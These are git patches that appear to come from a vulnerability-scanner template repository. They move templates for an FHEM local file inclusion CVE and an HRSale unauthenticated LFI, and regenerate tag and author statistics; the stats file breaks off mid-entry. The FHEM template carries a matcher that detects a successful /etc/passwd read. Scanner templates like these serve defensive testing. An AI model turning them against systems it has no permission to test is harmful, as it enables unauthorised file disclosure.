26a9bbc797bc50d583ffa38d77d6b18442458596 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Sat, 13 Nov 2021 23:34:22 +0530 Subject: [PATCH 3589/4083] Update and rename CVE-2020-19360.yaml to cves/2020/CVE-2020-19360.yaml --- CVE-2020-19360.yaml => cves/2020/CVE-2020-19360.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) rename CVE-2020-19360.yaml => cves/2020/CVE-2020-19360.yaml (96%) diff --git a/CVE-2020-19360.yaml b/cves/2020/CVE-2020-19360.yaml similarity index 96% rename from CVE-2020-19360.yaml rename to cves/2020/CVE-2020-19360.yaml index a85a4e43b3..69d08e80ff 100644 --- a/CVE-2020-19360.yaml +++ b/cves/2020/CVE-2020-19360.yaml @@ -7,11 +7,11 @@ info: reference: - https://github.com/EmreOvunc/FHEM-6.0-Local-File-Inclusion-LFI-Vulnerability/blob/master/README.md - https://www.cvedetails.com/cve/CVE-2020-19360/ - tags: fhem,lfi classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-19360 + tags: fhem,lfi,cve,cve2020 requests: - method: GET @@ -20,7 +20,6 @@ requests: matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" From 9a227941a1087651e69b57f5fbcc8fe44c186fc8 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Sat, 13 Nov 2021 23:37:32 +0530 Subject: [PATCH 3590/4083] Rename hrsale-unauthenticated-lfi.yaml to vulnerabilities/other/hrsale-unauthenticated-lfi.yaml --- .../other/hrsale-unauthenticated-lfi.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename hrsale-unauthenticated-lfi.yaml => vulnerabilities/other/hrsale-unauthenticated-lfi.yaml (100%) diff --git a/hrsale-unauthenticated-lfi.yaml b/vulnerabilities/other/hrsale-unauthenticated-lfi.yaml similarity index 100% rename from hrsale-unauthenticated-lfi.yaml rename to vulnerabilities/other/hrsale-unauthenticated-lfi.yaml From 1226bbc63801971f4eed283057f89941baca3e5e Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sat, 13 Nov 2021 20:02:23 +0000 Subject: [PATCH 3591/4083] Auto Generated Templates Stats [Sat Nov 13 20:02:23 UTC 2021] :robot: --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 1964 +++++++++++++++++++++--------------------- TOP-10.md | 20 +- 3 files changed, 1003 insertions(+), 983 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index 6ef7d7d0dc..ff66c22fc4 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":862},{"name":"lfi","count":353},{"name":"panel","count":297},{"name":"xss","count":269},{"name":"wordpress","count":263},{"name":"exposure","count":253},{"name":"rce","count":222},{"name":"tech","count":205},{"name":"wp-plugin","count":181},{"name":"cve2021","count":169},{"name":"cve2020","count":167},{"name":"joomla","count":128},{"name":"cve2010","count":109},{"name":"token-spray","count":102},{"name":"cve2019","count":102},{"name":"config","count":100},{"name":"cve2018","count":94},{"name":"iot","count":81},{"name":"apache","count":76},{"name":"oast","count":75},{"name":"takeover","count":70},{"name":"default-login","count":69},{"name":"token","count":68},{"name":"file","count":57},{"name":"cve2017","count":53},{"name":"unauth","count":51},{"name":"network","count":44},{"name":"ssrf","count":44},{"name":"","count":43},{"name":"sqli","count":42},{"name":"oracle","count":40},{"name":"cve2016","count":40},{"name":"redirect","count":38},{"name":"logs","count":35},{"name":"misconfig","count":32},{"name":"google","count":30},{"name":"cve2015","count":30},{"name":"jira","count":29},{"name":"atlassian","count":29},{"name":"cisco","count":28},{"name":"auth-bypass","count":27},{"name":"cve2014","count":27},{"name":"listing","count":27},{"name":"generic","count":24},{"name":"misc","count":22},{"name":"disclosure","count":22},{"name":"router","count":22},{"name":"aem","count":19},{"name":"debug","count":18},{"name":"sap","count":18},{"name":"springboot","count":18},{"name":"cve2012","count":18},{"name":"weblogic","count":16},{"name":"aws","count":15},{"name":"wp-theme","count":15},{"name":"php","count":15},{"name":"fuzz","count":15},{"name":"devops","count":15},{"name":"cve2011","count":15},{"name":"deserialization","count":14},{"name":"login","count":14},{"name":"cve2009","count":14},{"name":"struts","count":14},{"name":"zoho","count":13},{"name":"adobe","count":13},{"name":"android","count":13},{"name":"dlink","count":13},{"name":"dns","count":13},{"name":"jenkins","count":12},{"name":"manageengine","count":12},{"name":"cve2013","count":11},{"name":"intrusive","count":11},{"name":"xxe","count":11},{"name":"magento","count":11},{"name":"hp","count":10},{"name":"dell","count":10},{"name":"ftp","count":9},{"name":"rails","count":9},{"name":"vmware","count":9},{"name":"ibm","count":9},{"name":"kubernetes","count":9},{"name":"fastjson","count":9},{"name":"gitlab","count":9},{"name":"backup","count":8},{"name":"cve2008","count":8},{"name":"airflow","count":8},{"name":"ruijie","count":8},{"name":"cnvd","count":8},{"name":"microsoft","count":8},{"name":"scada","count":8},{"name":"nginx","count":8},{"name":"netgear","count":7},{"name":"fileupload","count":7},{"name":"camera","count":7},{"name":"confluence","count":7},{"name":"files","count":7},{"name":"coldfusion","count":7},{"name":"solr","count":7},{"name":"django","count":7},{"name":"cms","count":7},{"name":"docker","count":6},{"name":"drupal","count":6},{"name":"jetty","count":6},{"name":"nodejs","count":6},{"name":"lucee","count":6},{"name":"sitecore","count":6},{"name":"prometheus","count":6},{"name":"citrix","count":6},{"name":"api","count":6},{"name":"laravel","count":6},{"name":"phpmyadmin","count":6},{"name":"rconfig","count":6},{"name":"windows","count":5},{"name":"gocd","count":5},{"name":"ssti","count":5},{"name":"tomcat","count":5},{"name":"go","count":5},{"name":"java","count":5},{"name":"iis","count":5},{"name":"thinkphp","count":5},{"name":"wso2","count":5},{"name":"dedecms","count":5},{"name":"jolokia","count":5},{"name":"grafana","count":5},{"name":"symfony","count":5},{"name":"printer","count":5},{"name":"crlf","count":5},{"name":"circarlife","count":5},{"name":"headless","count":5},{"name":"webserver","count":4},{"name":"samsung","count":4},{"name":"npm","count":4},{"name":"zimbra","count":4},{"name":"maps","count":4},{"name":"vpn","count":4},{"name":"solarwinds","count":4},{"name":"artifactory","count":4},{"name":"buffalo","count":4},{"name":"symantec","count":4},{"name":"hongdian","count":4},{"name":"proxy","count":4},{"name":"enum","count":4},{"name":"bigip","count":4},{"name":"wcs","count":4},{"name":"git","count":4},{"name":"resin","count":4},{"name":"rfi","count":4},{"name":"slack","count":4},{"name":"amazon","count":4},{"name":"magmi","count":4},{"name":"zabbix","count":4},{"name":"strapi","count":4},{"name":"elastic","count":4},{"name":"firebase","count":4},{"name":"exchange","count":4},{"name":"asp","count":4},{"name":"traversal","count":4},{"name":"keycloak","count":4},{"name":"microstrategy","count":4},{"name":"firmware","count":4},{"name":"glpi","count":4},{"name":"thinkcmf","count":4},{"name":"moodle","count":4},{"name":"fatpipe","count":4},{"name":"vbulletin","count":3},{"name":"nacos","count":3},{"name":"github","count":3},{"name":"terramaster","count":3},{"name":"openam","count":3},{"name":"ssh","count":3},{"name":"jeesns","count":3},{"name":"activemq","count":3},{"name":"nosqli","count":3},{"name":"sql","count":3},{"name":"node","count":3},{"name":"zhiyuan","count":3},{"name":"log","count":3},{"name":"jellyfin","count":3},{"name":"minio","count":3},{"name":"targa","count":3},{"name":"kevinlab","count":3},{"name":"linkerd","count":3},{"name":"azure","count":3},{"name":"hoteldruid","count":3},{"name":"mongodb","count":3},{"name":"lfr","count":3},{"name":"openssh","count":3},{"name":"telerik","count":3},{"name":"smtp","count":3},{"name":"httpd","count":3},{"name":"backdoor","count":3},{"name":"oa","count":3},{"name":"kibana","count":3},{"name":"fanruan","count":3},{"name":"fpd","count":3},{"name":"opensis","count":3},{"name":"cacti","count":3},{"name":"kafka","count":3},{"name":"exposures","count":3},{"name":"caucho","count":3},{"name":"search","count":3},{"name":"nexus","count":3},{"name":"cloud","count":3},{"name":"tikiwiki","count":3},{"name":"ebs","count":3},{"name":"r-seenet","count":3},{"name":"injection","count":3},{"name":"cves","count":3},{"name":"itop","count":3},{"name":"sonicwall","count":3},{"name":"ofbiz","count":3},{"name":"lansweeper","count":3},{"name":"druid","count":3},{"name":"bitrix","count":3},{"name":"springcloud","count":3},{"name":"mail","count":3},{"name":"movable","count":3},{"name":"cve2007","count":3},{"name":"lotus","count":2},{"name":"hashicorp","count":2},{"name":"icewarp","count":2},{"name":"service","count":2},{"name":"pega","count":2},{"name":"mida","count":2},{"name":"bypass","count":2},{"name":"akkadian","count":2},{"name":"storage","count":2},{"name":"chamilo","count":2},{"name":"adminer","count":2},{"name":"hasura","count":2},{"name":"status","count":2},{"name":"openvpn","count":2},{"name":"cve2005","count":2},{"name":"kentico","count":2},{"name":"idrac","count":2},{"name":"favicon","count":2},{"name":"totemomail","count":2},{"name":"axis2","count":2},{"name":"jeedom","count":2},{"name":"igs","count":2},{"name":"heroku","count":2},{"name":"ilo","count":2},{"name":"netis","count":2},{"name":"text","count":2},{"name":"trixbox","count":2},{"name":"prestashop","count":2},{"name":"yapi","count":2},{"name":"places","count":2},{"name":"flir","count":2},{"name":"ecology","count":2},{"name":"hikvision","count":2},{"name":"qcubed","count":2},{"name":"openfire","count":2},{"name":"mailchimp","count":2},{"name":"ucmdb","count":2},{"name":"cache","count":2},{"name":"spark","count":2},{"name":"ec2","count":2},{"name":"bitly","count":2},{"name":"netsweeper","count":2},{"name":"upload","count":2},{"name":"glassfish","count":2},{"name":"natshell","count":2},{"name":"jboss","count":2},{"name":"zeroshell","count":2},{"name":"redis","count":2},{"name":"linux","count":2},{"name":"voipmonitor","count":2},{"name":"saltstack","count":2},{"name":"payara","count":2},{"name":"bruteforce","count":2},{"name":"aruba","count":2},{"name":"fortios","count":2},{"name":"rancher","count":2},{"name":"nextjs","count":2},{"name":"spring","count":2},{"name":"geowebserver","count":2},{"name":"horde","count":2},{"name":"dos","count":2},{"name":"maian","count":2},{"name":"shellshock","count":2},{"name":"prtg","count":2},{"name":"yii","count":2},{"name":"qihang","count":2},{"name":"leak","count":2},{"name":"huawei","count":2},{"name":"emerge","count":2},{"name":"liferay","count":2},{"name":"mcafee","count":2},{"name":"aviatrix","count":2},{"name":"electron","count":2},{"name":"harbor","count":2},{"name":"getsimple","count":2},{"name":"akamai","count":2},{"name":"smb","count":2},{"name":"seeyon","count":2},{"name":"fortinet","count":2},{"name":"python","count":2},{"name":"webcam","count":2},{"name":"tidb","count":2},{"name":"jsf","count":2},{"name":"splunk","count":2},{"name":"ruby","count":2},{"name":"chyrp","count":2},{"name":"justwriting","count":2},{"name":"hjtcloud","count":2},{"name":"globalprotect","count":2},{"name":"dolibarr","count":2},{"name":"axis","count":2},{"name":"vrealize","count":2},{"name":"avantfax","count":2},{"name":"rockmongo","count":2},{"name":"forcepoint","count":2},{"name":"chiyu","count":2},{"name":"backups","count":2},{"name":"xxljob","count":2},{"name":"wordfence","count":2},{"name":"aspose","count":2},{"name":"rocketchat","count":2},{"name":"s3","count":2},{"name":"paloalto","count":2},{"name":"oauth","count":2},{"name":"rstudio","count":2},{"name":"plesk","count":2},{"name":"frp","count":2},{"name":"commax","count":2},{"name":"vcenter","count":2},{"name":"guacamole","count":2},{"name":"hostheader-injection","count":2},{"name":"grav","count":2},{"name":"sharepoint","count":2},{"name":"waf","count":2},{"name":"kong","count":2},{"name":"odoo","count":2},{"name":"db","count":2},{"name":"hpe","count":2},{"name":"phpcollab","count":2},{"name":"couchdb","count":2},{"name":"ecoa","count":2},{"name":"embed","count":2},{"name":"wuzhicms","count":2},{"name":"linkedin","count":2},{"name":"idea","count":2},{"name":"openemr","count":2},{"name":"middleware","count":2},{"name":"nagios","count":2},{"name":"sonarqube","count":2},{"name":"phpstorm","count":2},{"name":"myfactory","count":2},{"name":"showdoc","count":2},{"name":"nextcloud","count":2},{"name":"bucket","count":2},{"name":"jetbrains","count":2},{"name":"tor","count":1},{"name":"upnp","count":1},{"name":"ruckus","count":1},{"name":"javascript","count":1},{"name":"syslog","count":1},{"name":"csod","count":1},{"name":"shiro","count":1},{"name":"cooperhewitt","count":1},{"name":"plone","count":1},{"name":"twitter","count":1},{"name":"circontrorl","count":1},{"name":"cerebro","count":1},{"name":"achecker","count":1},{"name":"jmx","count":1},{"name":"postgres","count":1},{"name":"arl","count":1},{"name":"lotuscms","count":1},{"name":"oneblog","count":1},{"name":"tinymce","count":1},{"name":"kerbynet","count":1},{"name":"websvn","count":1},{"name":"netmask","count":1},{"name":"nps","count":1},{"name":"ilo4","count":1},{"name":"pcoip","count":1},{"name":"emby","count":1},{"name":"shoretel","count":1},{"name":"dwsync","count":1},{"name":"myvuehelp","count":1},{"name":"razor","count":1},{"name":"yealink","count":1},{"name":"roads","count":1},{"name":"varnish","count":1},{"name":"rmi","count":1},{"name":"octoprint","count":1},{"name":"hiboss","count":1},{"name":"redhat","count":1},{"name":"apigee","count":1},{"name":"tcexam","count":1},{"name":"phpunit","count":1},{"name":"opm","count":1},{"name":"phpfastcache","count":1},{"name":"webui","count":1},{"name":"nownodes","count":1},{"name":"sourcebans","count":1},{"name":"xunchi","count":1},{"name":"embedthis","count":1},{"name":"springframework","count":1},{"name":"yachtcontrol","count":1},{"name":"openerp","count":1},{"name":"chevereto","count":1},{"name":"mantis","count":1},{"name":"centos","count":1},{"name":"lokalise","count":1},{"name":"tugboat","count":1},{"name":"square","count":1},{"name":"clave","count":1},{"name":"woocommerce","count":1},{"name":"commscope","count":1},{"name":"dribbble","count":1},{"name":"parentlink","count":1},{"name":"sugarcrm","count":1},{"name":"terraform","count":1},{"name":"episerver","count":1},{"name":"krweb","count":1},{"name":"circle","count":1},{"name":"shopxo","count":1},{"name":"livezilla","count":1},{"name":"proftpd","count":1},{"name":"zookeeper","count":1},{"name":"plc","count":1},{"name":"particle","count":1},{"name":"portainer","count":1},{"name":"placeos","count":1},{"name":"tinypng","count":1},{"name":"redmine","count":1},{"name":"office365","count":1},{"name":"adiscon","count":1},{"name":"dnssec","count":1},{"name":"tieline","count":1},{"name":"timeclock","count":1},{"name":"bingmaps","count":1},{"name":"calendarix","count":1},{"name":"fortiweb","count":1},{"name":"vsphere","count":1},{"name":"webftp","count":1},{"name":"floc","count":1},{"name":"karel","count":1},{"name":"owasp","count":1},{"name":"cofax","count":1},{"name":"ricoh","count":1},{"name":"kafdrop","count":1},{"name":"sceditor","count":1},{"name":"owa","count":1},{"name":"geolocation","count":1},{"name":"circleci","count":1},{"name":"gotmls","count":1},{"name":"totaljs","count":1},{"name":"twitter-server","count":1},{"name":"fortigates","count":1},{"name":"wavemaker","count":1},{"name":"natemail","count":1},{"name":"memcached","count":1},{"name":"k8","count":1},{"name":"kodi","count":1},{"name":"openrestry","count":1},{"name":"actuator","count":1},{"name":"jnoj","count":1},{"name":"ambari","count":1},{"name":"asus","count":1},{"name":"faraday","count":1},{"name":"digitalocean","count":1},{"name":"shoppable","count":1},{"name":"crm","count":1},{"name":"pivotaltracker","count":1},{"name":"realteo","count":1},{"name":"optiLink","count":1},{"name":"streetview","count":1},{"name":"webmin","count":1},{"name":"pendo","count":1},{"name":"imap","count":1},{"name":"sage","count":1},{"name":"sarg","count":1},{"name":"zcms","count":1},{"name":"tapestry","count":1},{"name":"lanproxy","count":1},{"name":"smartsense","count":1},{"name":"metinfo","count":1},{"name":"timezone","count":1},{"name":"luftguitar","count":1},{"name":"miscrsoft","count":1},{"name":"tpshop","count":1},{"name":"paypal","count":1},{"name":"yzmcms","count":1},{"name":"mautic","count":1},{"name":"centreon","count":1},{"name":"craftcms","count":1},{"name":"doh","count":1},{"name":"micro-user-service","count":1},{"name":"clockwatch","count":1},{"name":"duomicms","count":1},{"name":"bolt","count":1},{"name":"details","count":1},{"name":"redwood","count":1},{"name":"gstorage","count":1},{"name":"spidercontrol","count":1},{"name":"emc","count":1},{"name":"manager","count":1},{"name":"fiori","count":1},{"name":"cse","count":1},{"name":"gridx","count":1},{"name":"octobercms","count":1},{"name":"mapbox","count":1},{"name":"xmlchart","count":1},{"name":"okta","count":1},{"name":"intercom","count":1},{"name":"jfrog","count":1},{"name":"fedora","count":1},{"name":"europeana","count":1},{"name":"deviantart","count":1},{"name":"xiuno","count":1},{"name":"frontpage","count":1},{"name":"viewpoint","count":1},{"name":"alibaba","count":1},{"name":"meraki","count":1},{"name":"webmodule-ee","count":1},{"name":"eprints","count":1},{"name":"dahua","count":1},{"name":"newrelic","count":1},{"name":"wildfly","count":1},{"name":"primetek","count":1},{"name":"ioncube","count":1},{"name":"darkstat","count":1},{"name":"geocode","count":1},{"name":"trane","count":1},{"name":"codeigniter","count":1},{"name":"froxlor","count":1},{"name":"spip","count":1},{"name":"dotnetnuke","count":1},{"name":"exponentcms","count":1},{"name":"mkdocs","count":1},{"name":"visualtools","count":1},{"name":"dvr","count":1},{"name":"svn","count":1},{"name":"ssltls","count":1},{"name":"mara","count":1},{"name":"minimouse","count":1},{"name":"fastcgi","count":1},{"name":"seacms","count":1},{"name":" default-login","count":1},{"name":"ulterius","count":1},{"name":"csrfguard","count":1},{"name":"umbraco","count":1},{"name":"mobileiron","count":1},{"name":"sentry","count":1},{"name":"jquery","count":1},{"name":"kubeflow","count":1},{"name":"htmli","count":1},{"name":"kyan","count":1},{"name":"thedogapi","count":1},{"name":"moin","count":1},{"name":"fontawesome","count":1},{"name":"ecom","count":1},{"name":"leanix","count":1},{"name":"cloudron","count":1},{"name":"kindeditor","count":1},{"name":"feifeicms","count":1},{"name":"jumpcloud","count":1},{"name":"iconfinder","count":1},{"name":"shopware","count":1},{"name":"postmark","count":1},{"name":"visualstudio","count":1},{"name":"remkon","count":1},{"name":"selea","count":1},{"name":"pagerduty","count":1},{"name":"xdcms","count":1},{"name":"cves2001","count":1},{"name":"blind","count":1},{"name":"lg-nas","count":1},{"name":"qvisdvr","count":1},{"name":"sast","count":1},{"name":"dbeaver","count":1},{"name":"oscommerce","count":1},{"name":"smartblog","count":1},{"name":"fortigate","count":1},{"name":"iucn","count":1},{"name":"bazarr","count":1},{"name":"biometrics","count":1},{"name":"rubedo","count":1},{"name":"camunda","count":1},{"name":"timesheet","count":1},{"name":"graph","count":1},{"name":"eyou","count":1},{"name":"rabbitmq","count":1},{"name":"opentsdb","count":1},{"name":"sterling","count":1},{"name":"phalcon","count":1},{"name":"auth","count":1},{"name":"nimble","count":1},{"name":"urlscan","count":1},{"name":"ognl","count":1},{"name":"jenkin","count":1},{"name":"vscode","count":1},{"name":"empirecms","count":1},{"name":"wazuh","count":1},{"name":"nc2","count":1},{"name":"traefik","count":1},{"name":"esmtp","count":1},{"name":"xml","count":1},{"name":"fcm","count":1},{"name":"expose","count":1},{"name":"mediumish","count":1},{"name":"mod-proxy","count":1},{"name":"finereport","count":1},{"name":"dom","count":1},{"name":"setup","count":1},{"name":"cgi","count":1},{"name":"csrf","count":1},{"name":"webadmin","count":1},{"name":"rijksmuseum","count":1},{"name":"nexusdb","count":1},{"name":"interlib","count":1},{"name":"cobub","count":1},{"name":"find","count":1},{"name":"speed","count":1},{"name":"glances","count":1},{"name":"facebook","count":1},{"name":"landrayoa","count":1},{"name":"elevation","count":1},{"name":"gurock","count":1},{"name":"acme","count":1},{"name":"gsoap","count":1},{"name":"majordomo2","count":1},{"name":"discord","count":1},{"name":"wifisky","count":1},{"name":"beanstalk","count":1},{"name":"mongo","count":1},{"name":"linksys","count":1},{"name":"tileserver","count":1},{"name":"aniapi","count":1},{"name":"etherscan","count":1},{"name":"messaging","count":1},{"name":"fortilogger","count":1},{"name":"testrail","count":1},{"name":"bullwark","count":1},{"name":"blackboard","count":1},{"name":"wmt","count":1},{"name":"appveyor","count":1},{"name":"raspap","count":1},{"name":"opencast","count":1},{"name":"cocoon","count":1},{"name":"expressjs","count":1},{"name":"pulsesecure","count":1},{"name":"netlify","count":1},{"name":"sco","count":1},{"name":"sureline","count":1},{"name":"dreamweaver","count":1},{"name":"phpinfo","count":1},{"name":"wix","count":1},{"name":"netrc","count":1},{"name":"contentkeeper","count":1},{"name":"tink","count":1},{"name":"etherpad","count":1},{"name":"maxsite","count":1},{"name":"place","count":1},{"name":"phpwiki","count":1},{"name":"opensns","count":1},{"name":"cors","count":1},{"name":"powercreator","count":1},{"name":"omi","count":1},{"name":"email","count":1},{"name":"iterable","count":1},{"name":"directions","count":1},{"name":"package","count":1},{"name":"solarlog","count":1},{"name":"stripe","count":1},{"name":"rhymix","count":1},{"name":"shopizer","count":1},{"name":"avtech","count":1},{"name":"mailgun","count":1},{"name":"vidyo","count":1},{"name":"dotnet","count":1},{"name":"pentaho","count":1},{"name":"webex","count":1},{"name":"openweather","count":1},{"name":"listserv","count":1},{"name":"bash","count":1},{"name":"concrete","count":1},{"name":"uwsgi","count":1},{"name":"artica","count":1},{"name":"hortonworks","count":1},{"name":"limit","count":1},{"name":"grails","count":1},{"name":"cscart","count":1},{"name":"ntopng","count":1},{"name":"redcap","count":1},{"name":"securityspy","count":1},{"name":"nuxeo","count":1},{"name":"cve2006","count":1},{"name":"simplecrm","count":1},{"name":"apiman","count":1},{"name":"hadoop","count":1},{"name":"pacsone","count":1},{"name":"skywalking","count":1},{"name":"nedi","count":1},{"name":"extractor","count":1},{"name":"servicenow","count":1},{"name":"phpfusion","count":1},{"name":"buildkite","count":1},{"name":"codemeter","count":1},{"name":"secmail","count":1},{"name":"cve202","count":1},{"name":"ns","count":1},{"name":"comodo","count":1},{"name":"monitorr","count":1},{"name":"pmb","count":1},{"name":"adb","count":1},{"name":"locations","count":1},{"name":"cockpit","count":1},{"name":"wing-ftp","count":1},{"name":"pippoint","count":1},{"name":"tenda","count":1},{"name":"glowroot","count":1},{"name":"resourcespace","count":1},{"name":"sonarcloud","count":1},{"name":"keenetic","count":1},{"name":"wiki","count":1},{"name":"iptime","count":1},{"name":"accela","count":1},{"name":"netgenie","count":1},{"name":"api-manager","count":1},{"name":"beanshell","count":1},{"name":"nsasg","count":1},{"name":"asana","count":1},{"name":"eg","count":1},{"name":"labtech","count":1},{"name":"tensorboard","count":1},{"name":"smi","count":1},{"name":"gogs","count":1},{"name":"nomad","count":1},{"name":"wp","count":1},{"name":"lighttpd","count":1},{"name":"phpshowtime","count":1},{"name":"appweb","count":1},{"name":"axiom","count":1},{"name":"jitsi","count":1},{"name":"calendly","count":1},{"name":"basic-auth","count":1},{"name":"expn","count":1},{"name":"circontrol","count":1},{"name":"moinmoin","count":1},{"name":"spotify","count":1},{"name":"sar2html","count":1},{"name":"blue-ocean","count":1},{"name":"zms","count":1},{"name":"wakatime","count":1},{"name":"lancom","count":1},{"name":"alienvault","count":1},{"name":"cherokee","count":1},{"name":"seeddms","count":1},{"name":"weglot","count":1},{"name":"mdb","count":1},{"name":"chinaunicom","count":1},{"name":"vanguard","count":1},{"name":"etouch","count":1},{"name":"openstack","count":1},{"name":"catfishcms","count":1},{"name":"olivetti","count":1},{"name":"dompdf","count":1},{"name":"abuseipdb","count":1},{"name":"ghost","count":1},{"name":"mariadb","count":1},{"name":"dbt","count":1},{"name":"acontent","count":1},{"name":"thecatapi","count":1},{"name":"jsp","count":1},{"name":"lutron","count":1},{"name":"scimono","count":1},{"name":"influxdb","count":1},{"name":"bigbluebutton","count":1},{"name":"jabber","count":1},{"name":"nuuo","count":1},{"name":"clockwork","count":1},{"name":"skycaiji","count":1},{"name":"graylog","count":1},{"name":"zenario","count":1},{"name":"plugin","count":1},{"name":"starttls","count":1},{"name":"st","count":1},{"name":"hiawatha","count":1},{"name":"wooyun","count":1},{"name":"ganglia","count":1},{"name":"salesforce","count":1},{"name":"mpsec","count":1},{"name":"motorola","count":1},{"name":"azkaban","count":1},{"name":"jaspersoft","count":1},{"name":"avalanche","count":1},{"name":"myucms","count":1},{"name":"ewebs","count":1},{"name":"metabase","count":1},{"name":"plastic","count":1},{"name":"ssl","count":1},{"name":"discourse","count":1},{"name":"erp-nc","count":1},{"name":"wavlink","count":1},{"name":"diris","count":1},{"name":"iceflow","count":1},{"name":"weather","count":1},{"name":"drone","count":1},{"name":"opensmtpd","count":1},{"name":"dropbox","count":1},{"name":"panos","count":1},{"name":"hubspot","count":1},{"name":"burp","count":1},{"name":"mongoshake","count":1},{"name":"rmc","count":1},{"name":"oidc","count":1},{"name":"turbocrm","count":1},{"name":"checkpoint","count":1},{"name":"mrtg","count":1},{"name":"okiko","count":1},{"name":"taiga","count":1},{"name":"zyxel","count":1},{"name":"socomec","count":1},{"name":"dotclear","count":1},{"name":"triconsole","count":1},{"name":"travis","count":1},{"name":"buttercms","count":1},{"name":"sendgrid","count":1},{"name":"database","count":1},{"name":"apos","count":1},{"name":"spectracom","count":1},{"name":"couchbase","count":1},{"name":"gitea","count":1},{"name":"qdpm","count":1},{"name":"weiphp","count":1},{"name":"elascticsearch","count":1},{"name":"panasonic","count":1},{"name":"magicflow","count":1},{"name":"perl","count":1},{"name":"aura","count":1},{"name":"zte","count":1},{"name":"webctrl","count":1},{"name":"swagger","count":1},{"name":"trilithic","count":1},{"name":"novnc","count":1},{"name":"processmaker","count":1},{"name":"addpac","count":1},{"name":"fuelcms","count":1},{"name":"geddy","count":1},{"name":"mantisbt","count":1},{"name":"javamelody","count":1},{"name":"flexbe","count":1},{"name":"binance","count":1},{"name":"route","count":1},{"name":"k8s","count":1},{"name":"goahead","count":1},{"name":"cloudinary","count":1},{"name":"logontracer","count":1},{"name":"szhe","count":1},{"name":"monitorix","count":1},{"name":"virustotal","count":1},{"name":"piluscart","count":1},{"name":"aspnuke","count":1},{"name":"cloudflare","count":1},{"name":"domxss","count":1},{"name":"tongda","count":1},{"name":"argussurveillance","count":1},{"name":"xampp","count":1},{"name":"javafaces","count":1},{"name":"billquick","count":1},{"name":"zend","count":1},{"name":"tamronos","count":1},{"name":"gloo","count":1},{"name":"postmessage","count":1},{"name":"robomongo","count":1},{"name":"idemia","count":1},{"name":"tjws","count":1},{"name":"pyramid","count":1},{"name":"node-red-dashboard","count":1},{"name":"gateone","count":1},{"name":"soar","count":1},{"name":"74cms","count":1},{"name":"ems","count":1},{"name":"dvwa","count":1},{"name":"jenzabar","count":1},{"name":"elfinder","count":1},{"name":"autocomplete","count":1},{"name":"scs","count":1},{"name":"sqlite","count":1},{"name":"nordex","count":1},{"name":"rujjie","count":1},{"name":"viewlinc","count":1},{"name":"sangfor","count":1},{"name":"klog","count":1},{"name":"instagram","count":1},{"name":"bedita","count":1},{"name":"tensorflow","count":1},{"name":"sprintful","count":1},{"name":"zarafa","count":1},{"name":"landray","count":1},{"name":"distance","count":1},{"name":"graphite","count":1},{"name":"saltapi","count":1},{"name":"cvnd","count":1},{"name":"nearby","count":1},{"name":"myanimelist","count":1},{"name":"announcekit","count":1},{"name":"sophos","count":1},{"name":"strava","count":1},{"name":"maccmsv10","count":1},{"name":"covalent","count":1},{"name":"nerdgraph","count":1},{"name":"haproxy","count":1},{"name":"clickhouse","count":1},{"name":"pgadmin","count":1},{"name":"youtube","count":1},{"name":"tracer","count":1},{"name":"solman","count":1},{"name":"clusterengine","count":1},{"name":"matrix","count":1},{"name":"ipstack","count":1},{"name":"pagespeed","count":1},{"name":"anchorcms","count":1},{"name":"sgp","count":1},{"name":"werkzeug","count":1},{"name":"tika","count":1},{"name":"jeewms","count":1},{"name":"cliniccases","count":1},{"name":"sidekiq","count":1},{"name":"clink-office","count":1},{"name":"zmanda","count":1},{"name":"cyberoam","count":1},{"name":"gilacms","count":1},{"name":"websphere","count":1},{"name":"gespage","count":1},{"name":"zm","count":1},{"name":"flink","count":1},{"name":"fastapi","count":1},{"name":"servicedesk","count":1},{"name":"pihole","count":1},{"name":"spf","count":1},{"name":"openx","count":1},{"name":"exacqvision","count":1},{"name":"stem","count":1},{"name":"netdata","count":1},{"name":"alertmanager","count":1},{"name":"alerta","count":1},{"name":"ueditor","count":1},{"name":"h3c-imc","count":1},{"name":"xvr","count":1},{"name":"wamp","count":1},{"name":"mysql","count":1},{"name":"rsyncd","count":1},{"name":"qsan","count":1},{"name":"mirai","count":1},{"name":"default","count":1},{"name":"woocomernce","count":1},{"name":"vnc","count":1},{"name":"geutebruck","count":1},{"name":"daybyday","count":1},{"name":"eyelock","count":1},{"name":"playable","count":1},{"name":"photo","count":1},{"name":"onelogin","count":1},{"name":"xmpp","count":1},{"name":"optimizely","count":1},{"name":"whm","count":1},{"name":"panabit","count":1},{"name":"nifi","count":1},{"name":"graphql","count":1},{"name":"rdp","count":1},{"name":"nweb2fax","count":1},{"name":"planon","count":1},{"name":"zzzcms","count":1},{"name":"wondercms","count":1},{"name":"visionhub","count":1},{"name":"dnn","count":1},{"name":"acexy","count":1},{"name":"synnefo","count":1},{"name":"gunicorn","count":1},{"name":"bookstack","count":1},{"name":"elasticsearch","count":1},{"name":"nette","count":1},{"name":"huijietong","count":1},{"name":"loqate","count":1},{"name":"loganalyzer","count":1},{"name":"thinkadmin","count":1},{"name":"vercel","count":1},{"name":"svnserve","count":1},{"name":"vsftpd","count":1},{"name":"bing","count":1},{"name":"gitlist","count":1},{"name":"subrion","count":1},{"name":"adafruit","count":1},{"name":"b2evolution","count":1},{"name":"key","count":1},{"name":"tectuus","count":1}],"authors":[{"name":"dhiyaneshdk","count":315},{"name":"daffainfo","count":308},{"name":"pikpikcu","count":281},{"name":"pdteam","count":210},{"name":"geeknik","count":172},{"name":"dwisiswant0","count":152},{"name":"gy741","count":85},{"name":"pussycat0x","count":77},{"name":"princechaddha","count":67},{"name":"madrobot","count":65},{"name":"zzeitlin","count":63},{"name":"0x_akoko","count":62},{"name":"gaurang","count":42},{"name":"philippedelteil","count":31},{"name":"ice3man","count":26},{"name":"organiccrap","coun